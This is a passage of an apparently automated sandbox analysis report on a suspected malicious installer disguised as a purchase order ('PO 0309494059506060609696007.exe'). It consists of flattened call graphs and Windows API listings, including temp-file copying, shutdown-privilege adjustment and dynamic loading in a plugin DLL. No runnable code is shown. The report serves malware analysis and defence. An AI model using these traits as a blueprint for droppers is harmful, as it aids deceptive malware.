401c9f SendMessageW 4647->4649 4648->4650 4649->4650 5473 402aa0 SendMessageW 5474 402aba InvalidateRect 5473->5474 5475 402ac5 5473->5475 5474->5475 5476 402821 5477 402827 5476->5477 5478 402ac5 5477->5478 5479 40282f FindClose 5477->5479 5479->5478 5480 4043a1 lstrlenW 5481 4043c0 5480->5481 5482 4043c2 WideCharToMultiByte 5480->5482 5481->5482 5483 404722 5484 40474e 5483->5484 5485 40475f 5483->5485 5544 405904 GetDlgItemTextW 5484->5544 5487 40476b GetDlgItem 5485->5487 5493 4047ca 5485->5493 5489 40477f 5487->5489 5488 404759 5491 40654e 5 API calls 5488->5491 5492 404793 SetWindowTextW 5489->5492 5499 405c3a 4 API calls 5489->5499 5490 4048ae 5541 404a5d 5490->5541 5546 405904 GetDlgItemTextW 5490->5546 5491->5485 5495 404231 18 API calls 5492->5495 5493->5490 5496 4062dc 17 API calls 5493->5496 5493->5541 5500 4047af 5495->5500 5501 40483e SHBrowseForFolderW 5496->5501 5497 4048de 5502 405c97 18 API calls 5497->5502 5498 404298 8 API calls 5503 404a71 5498->5503 5504 404789 5499->5504 5505 404231 18 API calls 5500->5505 5501->5490 5506 404856 CoTaskMemFree 5501->5506 5507 4048e4 5502->5507 5504->5492 5510 405b8f 3 API calls 5504->5510 5508 4047bd 5505->5508 5509 405b8f 3 API calls 5506->5509 5547 4062ba lstrcpynW 5507->5547 5545 404266 SendMessageW 5508->5545 5512 404863 5509->5512 5510->5492 5515 40489a SetDlgItemTextW 5512->5515 5519 4062dc 17 API calls 5512->5519 5514 4047c3 5517 406694 5 API calls 5514->5517 5515->5490 5516 4048fb 5518 406694 5 API calls 5516->5518 5517->5493 5526 404902 5518->5526 5520 404882 lstrcmpiW 5519->5520 5520->5515 5523 404893 lstrcatW 5520->5523 5521 404943 5548 4062ba lstrcpynW 5521->5548 5523->5515 5524 40494a 5525 405c3a 4 API calls 5524->5525 5527 404950 GetDiskFreeSpaceW 5525->5527 5526->5521 5529 405bdb 2 API calls 5526->5529 5531 40499b 5526->5531 5530 404974 MulDiv 5527->5530 5527->5531 5529->5526 5530->5531 5532 404ba7 20 API calls 5531->5532 5542 404a0c 5531->5542 5533 4049f9 5532->5533 5536 404a0e SetDlgItemTextW 5533->5536 5537 4049fe 5533->5537 5534 40140b 2 API calls 5538 404a2f 5534->5538 5536->5542 5540 404ade 20 API calls 5537->5540 5549 404253 KiUserCallbackDispatcher 5538->5549 5539 404a4b 5539->5541 5543 40467b SendMessageW 5539->5543 5540->5542 5541->5498 5542->5534 5542->5538 5543->5541 5544->5488 5545->5514 5546->5497 5547->5516 5548->5524 5549->5539 4701 4015a3 4702 402c41 17 API calls 4701->4702 4703 4015aa SetFileAttributesW 4702->4703 4704 4015bc 4703->4704 5550 4028ad 5551 402c41 17 API calls 5550->5551 5553 4028bb 5551->5553 5552 4028d1 5555 405d8b 2 API calls 5552->5555 5553->5552 5554 402c41 17 API calls 5553->5554 5554->5552 5556 4028d7 5555->5556 5578 405db0 GetFileAttributesW CreateFileW 5556->5578 5558 4028e4 5559 4028f0 GlobalAlloc 5558->5559 5560 402987 5558->5560 5563 402909 5559->5563 5564 40297e CloseHandle 5559->5564 5561 4029a2 5560->5561 5562 40298f DeleteFileW 5560->5562 5562->5561 5579 403347 SetFilePointer 5563->5579 5564->5560 5566 40290f 5567 403331 ReadFile 5566->5567 5568 402918 GlobalAlloc 5567->5568 5569 402928 5568->5569 5570 40295c 5568->5570 5571 403116 31 API calls 5569->5571 5572 405e62 WriteFile 5570->5572 5577 402935 5571->5577 5573 402968 GlobalFree 5572->5573 5574 403116 31 API calls 5573->5574 5576 40297b 5574->5576 5575 402953 GlobalFree 5575->5570 5576->5564 5577->5575 5578->5558 5579->5566 5580 401a30 5581 402c41 17 API calls 5580->5581 5582 401a39 ExpandEnvironmentStringsW 5581->5582 5583 401a4d 5582->5583 5585 401a60 5582->5585 5584 401a52 lstrcmpW 5583->5584 5583->5585 5584->5585 4792 402032 4793 402044 4792->4793 4794 4020f6 4792->4794 4795 402c41 17 API calls 4793->4795 4797 401423 24 API calls 4794->4797 4796 40204b 4795->4796 4798 402c41 17 API calls 4796->4798 4803 402250 4797->4803 4799 402054 4798->4799 4800 40206a LoadLibraryExW 4799->4800 4801 40205c GetModuleHandleW 4799->4801 4800->4794 4802 40207b 4800->4802 4801->4800 4801->4802 4815 406703 WideCharToMultiByte 4802->4815 4806 4020c5 4808 405322 24 API calls 4806->4808 4807 40208c 4809 402094 4807->4809 4810 4020ab 4807->4810 4811 40209c 4808->4811 4812 401423 24 API calls 4809->4812 4818 6e421777 4810->4818 4811->4803 4813 4020e8 FreeLibrary 4811->4813 4812->4811 4813->4803 4816 40672d GetProcAddress 4815->4816 4817 402086 4815->4817 4816->4817 4817->4806 4817->4807 4819 6e4217aa 4818->4819 4860 6e421b5f 4819->4860 4821 6e4217b1 4822 6e4218d6 4821->4822 4823 6e4217c2 4821->4823 4824 6e4217c9 4821->4824 4822->4811 4910 6e422352 4823->4910 4894 6e422394 4824->4894 4829 6e42180f 4923 6e422569 4829->4923 4830 6e42182d 4835 6e421833 4830->4835 4836 6e42187e 4830->4836 4831 6e4217f8 4843 6e4217ee 4831->4843 4920 6e422d37 4831->4920 4832 6e4217df 4834 6e4217e5 4832->4834 4840 6e4217f0 4832->4840 4834->4843 4904 6e422aac 4834->4904 4942 6e4215c6 4835->4942 4838 6e422569 10 API calls 4836->4838 4844 6e42186f 4838->4844 4839 6e421815 4934 6e4215b4 4839->4934 4914 6e422724 4840->4914 4843->4829 4843->4830 4851 6e4218c5 4844->4851 4948 6e42252c 4844->4948 4849 6e4217f6 4849->4843 4850 6e422569 10 API calls 4850->4844 4851->4822 4853 6e4218cf GlobalFree 4851->4853 4853->4822 4857 6e4218b1 4857->4851 4952 6e42153d wsprintfW 4857->4952 4858 6e4218aa FreeLibrary 4858->4857 4955 6e42121b GlobalAlloc 4860->4955 4862 6e421b83 4956 6e42121b GlobalAlloc 4862->4956 4864 6e421da9 GlobalFree GlobalFree GlobalFree 4865 6e421dc6 4864->4865 4880 6e421e10 4864->4880 4867 6e422192 4865->4867 4875 6e421ddb 4865->4875 4865->4880 4866 6e421b8e 4866->4864 4868 6e421c64 GlobalAlloc 4866->4868 4870 6e421caf lstrcpyW 4866->4870 4871 6e421ccd GlobalFree 4866->4871 4874 6e421cb9 lstrcpyW 4866->4874 4879 6e422064 4866->4879 4866->4880 4882 6e4220ec 4866->4882 4886 6e421d0b 4866->4886 4887 6e421fa5 GlobalFree 4866->4887 4889 6e42122c 2 API calls 4866->4889 4869 6e4221b4 GetModuleHandleW 4867->4869 4867->4880 4868->4866 4872 6e4221c5 LoadLibraryW 4869->4872 4873 6e4221da 4869->4873 4870->4874 4871->4866 4872->4873 4872->4880 4963 6e42161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4873->4963 4874->4866 4875->4880 4959 6e42122c 4875->4959 4877 6e42222c 4878 6e422239 lstrlenW 4877->4878 4877->4880 4964 6e42161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4878->4964 4962 6e42121b GlobalAlloc 4879->4962 4880->4821 4882->4880 4888 6e422134 lstrcpyW 4882->4888 4885 6e422253 4885->4880 4886->4866 4957 6e42158f GlobalSize GlobalAlloc 4886->4957 4887->4866 4888->4880 4889->4866 4891 6e4221ec 4891->4877 4892 6e422216 GetProcAddress 4891->4892 4892->4877 4893 6e42206d 4893->4821 4896 6e4223ac 4894->4896 4895 6e42122c GlobalAlloc lstrcpynW 4895->4896 4896->4895 4898 6e4224d5 GlobalFree 4896->4898 4899 6e422454 GlobalAlloc WideCharToMultiByte 4896->4899 4900 6e42247f GlobalAlloc CLSIDFromString 4896->4900 4902 6e42249e 4896->4902 4966 6e4212ba 4896->4966 4898->4896 4901 6e4217cf 4898->4901 4899->4898 4900->4898 4901->4831 4901->4832 4901->4843 4902->4898 4970 6e4226b8 4902->4970 4906 6e422abe 4904->4906 4905 6e422b63 VirtualAlloc 4909 6e422b81 4905->4909 4906->4905 4908 6e422c4d 4908->4843 4973 6e422a56 4909->4973 4911 6e422367 4910->4911 4912 6e422372 GlobalAlloc 4911->4912 4913 6e4217c8 4911->4913 4912->4911 4913->4824 4918 6e422754 4914->4918 4915 6e422802 4917 6e422808 GlobalSize 4915->4917 4919 6e422812 4915->4919 4916 6e4227ef GlobalAlloc 4916->4919 4917->4919 4918->4915 4918->4916 4919->4849 4921 6e422d42 4920->4921 4922 6e422d82 GlobalFree 4921->4922 4977 6e42121b GlobalAlloc 4923->4977 4925 6e42260e StringFromGUID2 4930 6e422573 4925->4930 4926 6e42261f lstrcpynW 4926->4930 4927 6e4225ec MultiByteToWideChar 4927->4930 4928 6e422632 wsprintfW 4928->4930 4929 6e422656 GlobalFree 4929->4930 4930->4925 4930->4926 4930->4927 4930->4928 4930->4929 4931 6e42268b GlobalFree 4930->4931 4932 6e421272 2 API calls 4930->4932 4978 6e4212e1 4930->4978 4931->4839 4932->4930 4982 6e42121b GlobalAlloc 4934->4982 4936 6e4215b9 4937 6e4215c6 2 API calls 4936->4937 4938 6e4215c3 4937->4938 4939 6e421272 4938->4939 4940 6e4212b5 GlobalFree 4939->4940 4941 6e42127b GlobalAlloc lstrcpynW 4939->4941 4940->4844 4941->4940 4943 6e4215d2 wsprintfW 4942->4943 4945 6e4215ff lstrcpyW 4942->4945 4947 6e421618 4943->4947 4945->4947 4947->4850 4949 6e42253a 4948->4949 4951 6e421891 4948->4951 4950 6e422556 GlobalFree 4949->4950 4949->4951 4950->4949 4951->4857 4951->4858 4953 6e421272 2 API calls 4952->4953 4954 6e42155e 4953->4954 4954->4851 4955->4862 4956->4866 4958 6e4215ad 4957->4958 4958->4886 4965 6e42121b GlobalAlloc 4959->4965 4961 6e42123b lstrcpynW 4961->4880 4962->4893 4963->4891 4964->4885 4965->4961 4967 6e4212c1 4966->4967 4968 6e42122c 2 API calls 4967->4968 4969 6e4212df 4968->4969 4969->4896 4971 6e4226c6 VirtualAlloc 4970->4971 4972 6e42271c 4970->4972 4971->4972 4972->4902 4974 6e422a61 4973->4974 4975 6e422a71 4974->4975 4976 6e422a66 GetLastError 4974->4976 4975->4908 4976->4975 4977->4930 4979 6e4212ea 4978->4979 4980 6e42130c 4978->4980 4979->4980 4981 6e4212f0 lstrcpyW 4979->4981 4980->4930 4981->4980 4982->4936 4988 401735 4989 402c41 17 API calls 4988->4989 4990 40173c SearchPathW 4989->4990 4991 4029e6 4990->4991 4992 401757 4990->4992 4992->4991 4994 4062ba lstrcpynW 4992->4994 4994->4991 5591 402a35 5592 402c1f 17 API calls 5591->5592 5593 402a3b 5592->5593 5594 402a72 5593->5594 5595 40288b 5593->5595 5597 402a4d 5593->5597 5594->5595 5596 4062dc 17 API calls 5594->5596 5596->5595 5597->5595 5599 406201 wsprintfW 5597->5599 5599->5595 5600 4014b8 5601 4014be 5600->5601 5602 401389 2 API calls 5601->5602 5603 4014c6 5602->5603 5604 401db9 GetDC 5605 402c1f 17 API calls 5604->5605 5606 401dcb GetDeviceCaps MulDiv ReleaseDC 5605->5606 5607 402c1f 17 API calls 5606->5607 5608 401dfc 5607->5608 5609 4062dc 17 API calls 5608->5609 5610 401e39 CreateFontIndirectW 5609->5610 5611 402592 5610->5611 5612 40283b 5613 402843 5612->5613 5614 402847 FindNextFileW 5613->5614 5615 402859 5613->5615 5614->5615 5616 4029e6 5615->5616 5618 4062ba lstrcpynW 5615->5618 5618->5616 5619 6e42103d 5620 6e42101b 5 API calls 5619->5620 5621 6e421056 5620->5621

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 40338f-4033cc SetErrorMode GetVersion 1 4033ce-4033d6 call 406694 0->1 2 4033df 0->2 1->2 7 4033d8 1->7 4 4033e4-4033f8 call 406624 lstrlenA 2->4 9 4033fa-403416 call 406694 * 3 4->9 7->2 16 403427-403486 #17 OleInitialize SHGetFileInfoW call 4062ba GetCommandLineW call 4062ba 9->16 17 403418-40341e 9->17 24 403490-4034aa call 405bbc CharNextW 16->24 25 403488-40348f 16->25 17->16 21 403420 17->21 21->16 28 4034b0-4034b6 24->28 29 4035c1-4035db GetTempPathW call 40335e 24->29 25->24 30 4034b8-4034bd 28->30 31 4034bf-4034c3 28->31 38 403633-40364d DeleteFileW call 402edd 29->38 39 4035dd-4035fb GetWindowsDirectoryW lstrcatW call 40335e 29->39 30->30 30->31 33 4034c5-4034c9 31->33 34 4034ca-4034ce 31->34 33->34 36 4034d4-4034da 34->36 37 40358d-40359a call 405bbc 34->37 42 4034f5-40352e 36->42 43 4034dc-4034e4 36->43 54 40359c-40359d 37->54 55 40359e-4035a4 37->55 56 403653-403659 38->56 57 4036fe-40370e call 4038d0 OleUninitialize 38->57 39->38 52 4035fd-40362d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40335e 39->52 50 403530-403535 42->50 51 40354b-403585 42->51 48 4034e6-4034e9 43->48 49 4034eb 43->49 48->42 48->49 49->42 50->51 58 403537-40353f 50->58 51->37 53 403587-40358b 51->53 52->38 52->57 53->37 60 4035ac-4035ba call 4062ba 53->60 54->55 55->28 61 4035aa 55->61 62 4036ee-4036f5 call 4039aa 56->62 63 40365f-40366a call 405bbc 56->63 75 403834-40383a 57->75 76 403714-403724 call 405920 ExitProcess 57->76 65 403541-403544 58->65 66 403546 58->66 68 4035bf 60->68 61->68 74 4036fa 62->74 80 4036b8-4036c2 63->80 81 40366c-4036a1 63->81 65->51 65->66 66->51 68->29 74->57 78 4038b8-4038c0 75->78 79 40383c-403852 GetCurrentProcess OpenProcessToken 75->79 82 4038c2 78->82 83 4038c6-4038ca ExitProcess 78->83 87 403854-403882 LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 403888-403896 call 406694 79->88 85 4036c4-4036d2 call 405c97 80->85 86 40372a-40373e call 40588b lstrcatW 80->86 89 4036a3-4036a7 81->89 82->83 85->57 99 4036d4-4036ea call 4062ba * 2 85->99 100 403740-403746 lstrcatW 86->100 101 40374b-403765 lstrcatW lstrcmpiW 86->101 87->88 102 4038a4-4038af ExitWindowsEx 88->102 103 403898-4038a2 88->103 93 4036b0-4036b4 89->93 94 4036a9-4036ae 89->94 93->89 98 4036b6 93->98 94->93 94->98 98->80 99->62 100->101 101->57 105 403767-40376a 101->105 102->78 106 4038b1-4038b3 call 40140b 102->106 103->102 103->106 108 403773 call 40586e 105->108 109 40376c-403771 call 4057f1 105->109 106->78 117 403778-403786 SetCurrentDirectoryW 108->117 109->117 118 403793-4037bc call 4062ba 117->118 119 403788-40378e call 4062ba 117->119 123 4037c1-4037dd call 4062dc DeleteFileW 118->123 119->118 126 40381e-403826 123->126 127 4037df-4037ef CopyFileW 123->127 126->123 128 403828-40382f call 406080 126->128 127->126 129 4037f1-403811 call 406080 call 4062dc call 4058a3 127->129 128->57 129->126 138 403813-40381a CloseHandle 129->138 138->126
                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 004033B2
                                                • GetVersion.KERNEL32 ref: 004033B8
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                                • OleInitialize.OLE32(00000000), ref: 0040342F
                                                • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
                                                • GetCommandLineW.KERNEL32(Undseeligheds17 Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",00000020,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",00000000,?,00000006,00000008,0000000A), ref: 00403498
                                                  • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                  • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D2
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040360B
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403624
                                                • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403638
                                                  • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Undseeligheds17 Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                • ExitProcess.KERNEL32 ref: 00403724
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403779
                                                • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\PO 0309494059506060609696007.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                                • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                • ExitProcess.KERNEL32 ref: 004038CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                • String ID: "C:\Users\user\Desktop\PO 0309494059506060609696007.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\sillinesses$C:\Users\user\AppData\Local\sillinesses\Foiningly$C:\Users\user\Desktop$C:\Users\user\Desktop\PO 0309494059506060609696007.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Undseeligheds17 Setup$\Temp$~nsu
                                                • API String ID: 3441113951-641072767
                                                • Opcode ID: 593c3742dd67c1f7477e39b01131e4c834872c0d536a98d30ddcc63d0ca4eb21
                                                • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                                • Opcode Fuzzy Hash: 593c3742dd67c1f7477e39b01131e4c834872c0d536a98d30ddcc63d0ca4eb21
                                                • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 139 405461-40547c 140 405482-405549 GetDlgItem * 3 call 404266 call 404bbf GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 40560b-405612 139->141 162 405567-40556a 140->162 163 40554b-405565 SendMessageW * 2 140->163 143 405614-405636 GetDlgItem CreateThread CloseHandle 141->143 144 40563c-405649 141->144 143->144 146 405667-405671 144->146 147 40564b-405651 144->147 151 405673-405679 146->151 152 4056c7-4056cb 146->152 149 405653-405662 ShowWindow * 2 call 404266 147->149 150 40568c-405695 call 404298 147->150 149->146 159 40569a-40569e 150->159 157 4056a1-4056b1 ShowWindow 151->157 158 40567b-405687 call 40420a 151->158 152->150 155 4056cd-4056d3 152->155 155->150 164 4056d5-4056e8 SendMessageW 155->164 160 4056c1-4056c2 call 40420a 157->160 161 4056b3-4056bc call 405322 157->161 158->150 160->152 161->160 168 40557a-405591 call 404231 162->168 169 40556c-405578 SendMessageW 162->169 163->162 170 4057ea-4057ec 164->170 171 4056ee-405719 CreatePopupMenu call 4062dc AppendMenuW 164->171 178 405593-4055a7 ShowWindow 168->178 179 4055c7-4055e8 GetDlgItem SendMessageW 168->179 169->168 170->159 176 40571b-40572b GetWindowRect 171->176 177 40572e-405743 TrackPopupMenu 171->177 176->177 177->170 180 405749-405760 177->180 181 4055b6 178->181 182 4055a9-4055b4 ShowWindow 178->182 179->170 183 4055ee-405606 SendMessageW * 2 179->183 184 405765-405780 SendMessageW 180->184 185 4055bc-4055c2 call 404266 181->185 182->185 183->170 184->184 186 405782-4057a5 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4057a7-4057ce SendMessageW 186->188 188->188 189 4057d0-4057e4 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                • GetClientRect.USER32(?,?), ref: 0040550B
                                                • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                  • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                • CloseHandle.KERNELBASE(00000000), ref: 00405636
                                                • ShowWindow.USER32(00000000), ref: 0040565A
                                                • ShowWindow.USER32(0001044C,00000008), ref: 0040565F
                                                • ShowWindow.USER32(00000008), ref: 004056A9
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                • CreatePopupMenu.USER32 ref: 004056EE
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                • GetWindowRect.USER32(?,?), ref: 00405722
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                • OpenClipboard.USER32(00000000), ref: 00405783
                                                • EmptyClipboard.USER32 ref: 00405789
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                • CloseClipboard.USER32 ref: 004057E4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 590372296-366298937
                                                • Opcode ID: 0adbb57e0d97c09077b74663f93bf726141b9520c4062d1a8b9589889d0798ed
                                                • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                                • Opcode Fuzzy Hash: 0adbb57e0d97c09077b74663f93bf726141b9520c4062d1a8b9589889d0798ed
                                                • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
